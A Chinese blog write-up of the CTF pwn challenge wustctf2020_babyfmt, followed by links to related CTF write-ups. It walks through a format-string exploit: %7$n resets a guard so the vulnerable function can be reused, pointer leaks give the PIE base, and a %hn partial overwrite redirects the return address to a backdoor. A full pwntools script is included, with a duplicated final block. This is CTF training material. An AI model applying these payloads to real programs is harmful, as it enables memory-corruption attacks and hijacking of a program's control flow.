wustctf2020_babyfmt

原创 已于 2022-04-07 00:23:16 修改 · 700 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

于 2022-04-07 00:21:39 首次发布
本文介绍了一种通过避开fmt函数的判定条件,利用`fmt_attack`函数实现简单漏洞利用的方法。作者详细讲解了如何利用 `%7$n` 指令来复用函数,修改返回地址并计算elf基址,最终完成后门设置。

一道简单fmt题,但是我搜解题记录时,觉得解得都挺复杂的。

似乎还没有文章用我的方法,那我就写一种简单的解法。

绕过fmt判断条件

我只用到了fmt_attack函数。

由于有一个判定条件:

unsigned __int64 __fastcall fmt_attack(int *a1)
{
  char format[56]; // [rsp+10h] [rbp-40h] BYREF
  unsigned __int64 v3; // [rsp+48h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  memset(format, 0, 0x30uLL);
  if ( *a1 > 0 )
  {
    puts("No way!");
    exit(1);
  }
  *a1 = 1;
  read_n(format, 40LL, format);
  printf(format);
  return __readfsqword(0x28u) ^ v3;

因此我们每次使用该函数时,将*a1处的值改为零即可循环利用该函数。

打断点,运行到代码*a1 = 1处

1

单步跟进,查看rax的值(a1地址)

2

运行到printf函数,查看a1的偏移

3

算上64位6个寄存器传参,偏移量+6,则a1偏移量为7。

则我们每次利用fmt_attack函数时,加上%7$n即可令*a1=0,即可重复利用fmt_attack。

更改返回地址为后门函数地址

运行到printf函数时,栈中会有许多函数返回地址。

其中第一条为fmt_attack函数的返回地址,

第二条是main函数的返回地址(main函数执行完会执行libc_start_main函数)。

由于本题开了pie保护,我们可以用partial write 篡改第一个返回地址。

4

注意:后门函数直接跳转到close函数后即可。

5

计算elf基址:

payload = b'%7$n+%17$p'
fmt(payload)
r.recvuntil(b'+')
ret_value = int(r.recvuntil(b'\n')[:-1],16)
elf_base = ret_value-0x102c

下一步直接更改低二字节即可。

低二字节值:

(elf_base+0xf56)&0xffff

完整exp

from pwn import *
r = process('/mnt/hgfs/ubuntu/BUUCTF/wustctf2020_babyfmt')
# r = remote('node4.buuoj.cn',29629)
secret_addr =0x202060

def fmt(payload):
    r.recvuntil(b">>")
    r.sendline(b'2')
    r.sendline(payload)

r.sendline(b'1')
r.sendline(b'2')
r.sendline(b'3')

fmt(b'%7$n-%16$p')
r.recvuntil(b'-')
ret_addr = int(r.recvuntil(b'\n')[:-1],16)-0x28

payload = b'%7$n+%17$p'
fmt(payload)
r.recvuntil(b'+')
ret_value = int(r.recvuntil(b'\n')[:-1],16)
elf_base = ret_value-0x102c

payload1 = b'%'+str((elf_base+0xf56)&0xffff).encode()+b'c%10$hn'
payload1 = payload1.ljust(0x10,b'a')
payload1+=p64(ret_addr)
fmt(payload1)
log.success("ret_value: "+hex(ret_value))
log.success("ret_addr: "+hex(ret_addr))
r.interactive()

fmt(payload1)
log.success("ret_value: "+hex(ret_value))
log.success("ret_addr: "+hex(ret_addr))
r.interactive()
NSSCTF [MoeCTF 2022]babyfmt
2401_88087539的博客
03-07 389
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 2091
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
星盟-pwn-babyfmt
qq_65147345的博客
07-29 359
泄露信息->改写rip->劫持程序流->调整输入大小->打开文件输出
BUUCTF:[WUSTCTF2020]朴实无华
末初 · mochu7
06-24 1547
首先在下发现 访问有一个假的flag,但是在响应头中找到一个提示,另外还有一个值得注意的是这里是 访问得到 PHP5中的函数中科学计数法符号无效,只会当作正常字符处理 所以这里利用科学计数法的符号就可以绕过level 1level 2直接可参考我的这篇文章:浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题最后直接绕过和即可...
[BUUCTF]-PWN:wustctf2020_easyfast解析(fastbin double free)
2301_79326813的博客
02-06 608
又是堆题,查看保护再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块,以及一个getshell的函数,但要满足条件。值得注意的是free函数没有清空堆块指针所以可以用double free有两种解法。
wustctf2020_getshell
m0sway的博客
11-28 876
wustctf2020_getshell 使用checksec查看: 只开启了一个栈不可执行,没开Canary,考虑栈溢出题目。 拉进IDA中查看: 主函数中直接给漏洞函数,跟进: read()函数,能读取0x20的数据,buf距离ebp0x18,因为这是个32位的程序,ebp+4后还能放下一个one_gadget 首先考虑下这个程序本身有没有get_shell的函数,通过搜索字符串可以发现函数shell(): ok了,这题直接秒了。 exp: from pwn import * #start
mrctf2020_shellcode_revenge|wustctf2020_name_your_cat|2018_gettingStart|SUCTF_2018_stack|wustctf2020
weixin_46521144的博客
04-05 515
这五道题都异常简单。。。也不知道为啥 wustctf2020_number_game 这题大概是csapp第二章学好了直接连就可以了。 v1=Tmin=-2147483648即可。因为32位有符号整数下Tmin是1000_0000_0000_0000,取反码加上1还是Tmin 2018_gettingStart 好吧,这道题还是CSAPP第二章知识直接运用。有一个简单的溢出覆盖,其实是考察浮点的位表示,写个c程序跑一下就出来了 #include<stdio.h> int .
BUUCTF wustctf2020_getshell
2401_88087539的博客
02-08 273
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
[BUUCTF]PWN——wustctf2020_name_your_cat(数组越界)
mcmuyanga的博客
03-13 1592
wustctf2020_name_your_cat 附件 步骤 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,在检索字符串的时候发现了后门 主要函数
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 1044
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
某道Pwn(格式化字符串漏洞)
热门推荐
龙哥盟
03-18 4万+
格式化字符串漏洞近几年出现频率少了,但是一些 CTF 中还有涉及,就当玩玩好了。首先看这一段代码,什么比赛的题我忘了:#include <stdio.h> int main(void) { int flag = 0; int *p = &flag; char a[100]; scanf("%s",a); printf(a); if(flag ==
BUUCTF-pwn(9)
njh18790816639的博客
01-05 880
gyctf_2020_borrowstack 使用栈迁移,将rsp迁移到bss段上,而bss段上处于可控位置。但是注意bss段低处处于不可写状态,如果rsp移动到该处,则程序无法进行下去! 尝试使用system函数,但是往往会涉及到bss段低处地址,而one_gadget则不需要过多占用栈地址,故采用one_gadget获取权限! from pwn import * from LibcSearcher import LibcSearcher context(log_level='debug',os='l
WUST-CTF2020 writeup
abtgu的博客
04-02 1717
文章目录WEBcheckinadminMISCSpace ClubWelcome爬Find meShopgirlfriendAlison likes jojo WEB checkin 题目: 无 解题思路: 打开链接,发现提问作者,打开查看器,发现按钮被隐藏,输入框被限制,更改代码,输入作者名,提示一个博客 打开,在最上方发现flag的一部分 仔细查看,有一篇名为《远古的blog》的博客,打...
WUST-CTF 2020 WriteUp
weixin_45883223的博客
03-30 3709
WUST-CTF 2020 WriteUp前言WebcheckinadminCV Maker朴实无华Crypto大数运算情书B@sebabyrsa佛说:只能四天MiscSpace ClubWelcome爬Find megirlfriendShopReverseCr0ssFunlevel1 前言 又一次被“面向萌新,题目友好”给骗了,我还是tcl。 Web checkin 打开链接发现要提交作者的名...
[MoeCTF 2022]babyfmt详解(四种不同的Poc,含思考过程)
最新发布
2301_76794844的博客
08-26 833
[MoeCTF 2022]babyfmt详解(四种不同的Poc,含思考过程)
WUSTCTF2020misc
01-14
### WUST CTF 2020 Misc 类别题目解析 #### 黄金体验镇魂曲 在该比赛中,选手需寻找特定格式的字符串作为标志(flag),例如 `wctf2020{y0u_kn0w_th3_rule5}` 并提交以获取分数[^2]。 #### 盲文转换挑战 对于名为`RE Cr0ssFun`的任务,给定的是一个看似无规律字符组合而成的字符串:`wctf2020{y$0$u_f$1$n$d$_M$e$e$e$e$e}`。通过分析可以发现这实际上是一个经过特殊编码处理后的Flag形式。去除其中多余的符号后可得正确答案[^1]。 #### PDF 文件中的秘密消息 存在一道涉及PDF文档的操作题——`Find me`。此题目的关键是利用图像编辑软件如Photoshop来揭示隐藏于图片内的文字信息,最终获得形似 `wctf2020{th1s_1s_@_pdf_and_y0u_can_use_phot0sh0p}` 的Flag[^3]。 #### 文本挖掘技巧应用实例 有一道关于从大量文本数据中提取有用信息的问题,在给出的文件夹内有一个叫做 Timothy 的子目录。通过对这些文本内容进行检索操作(比如使用 grep 工具),能够快速定位到含有 Flag 关键字的部分,进而得到完整的 Flag 字符串[^4]。 #### 实际环境互动实验 最后还有一项较为特别的任务叫作 Welcome 。参与者被提示要关注“三人”的概念,并执行随附的一个 exe 可执行程序。当向计算机展示三张不同人的照片时,便会触发显示 Flag 的机制[^5]。 ```python import re def extract_flag(text): pattern = r'wctf2020\{(.*?)\}' match = re.search(pattern, text) if match: return f"wctf2020{{{match.group(1)}}}" else: return "No flag found" text_samples = [ "blind text wctf2020{y$0$u_f$1$n$d$_M$e$e$e$e$e}", "gold experience requiem gives us the flag as wctf2020{y0u_kn0w_th3_rule5}", "hidden message inside pdf is revealed to be wctf2020{th1s_1s_@_pdf_and_y0u_can_use_phot0sh0p}", ] for sample in text_samples: print(extract_flag(sample)) ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值